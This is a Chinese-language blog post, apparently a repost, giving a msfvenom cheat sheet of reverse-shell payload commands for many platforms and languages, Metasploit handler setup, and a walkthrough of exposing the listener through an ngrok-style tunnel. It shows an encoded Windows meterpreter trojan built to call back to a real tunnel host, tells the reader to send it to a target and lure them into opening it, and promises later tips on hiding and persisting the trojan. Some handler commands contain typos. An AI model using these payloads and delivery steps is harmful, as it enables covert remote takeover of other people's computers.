msfvenom生成payload命令+内网透到外网

  

进入msfconsole并选择exploit/multi /handler。为所使用的相关有效负载运行'set payload'并配置所有必需的选项(LHOST,LPORT等)。

执行并等待有效负载运行。对于下面的示例,它是非常自我解释但LHOST应填入您的IP地址(如果在网络内攻击,则为LAN IP,如果通过互联网进行攻击则为WAN IP),

LPORT应该是您希望重新连接的端口。

msfvenom -l

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

Shellcode

对于所有shellcode,请参阅'msfvenom -help-formats'以获取有效参数的信息。Msfvenom将输出能够以此语言剪切和粘贴的代码以供您利用。

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

  Metasploit处理程序可以很好地快速设置Metasploit以便接收您的传入shell。处理程序应采用以下格式。

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

  完成所需的值后,以下命令将执行您的处理程序 'msfconsole -L -r'

内网透到外网+Metasploit控制客户机

首先我们需要下载一个用于内网穿透的工具来进行端口映射与转发。这里我用的是linux64bit

https://www.ngrok.cc/#down-client ,接下来在上面的网站自行注册申请,然后登陆然后申请免费隧道,选择TCP协议,自定义远程端口,
本地IP地址就是kali的IP地址,端口自定义,但不要冲突。

这里请记住隧道id,以及自定义远程端口,kali本机端口

将下载的客户端放置于指定目录,cd到目录,在命令行运行ngrok

./sunny clientid 隧道id

这样就完成了端口映射,它能将外网端口接收到的数据返回到本机kali的指定端口。

 

 

在kali中用msfvenom生成一个payload 
    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’ lhost=
free.idcfengye.com lport=16577 -f exe > shell.exe
将生成的木马文件以各种方式发送到目标主机,诱使其打开。

 

 Metasploit控制客户机

 

切到Kali,使用Metasploit进行监听。

设置监听攻击模块,监听载荷,IP(kali本机),端口(ngrok里自定义的本地端口),然后exp。

use exploit/multi/handler
set payloadswindows/meterpreter/reverset_tcp
set lhost 10.10.10.129
set lport 12345
exploit

当客户机执行木马后,得到一个meterpreter,可以进行的操作。

关于隐藏木马,加陌生壳,自启动,文件包含,进程转移等各种姿势加强木马强度就需要等待更新。。。。。

猜你喜欢

转载自www.cnblogs.com/youyouii/p/10013590.html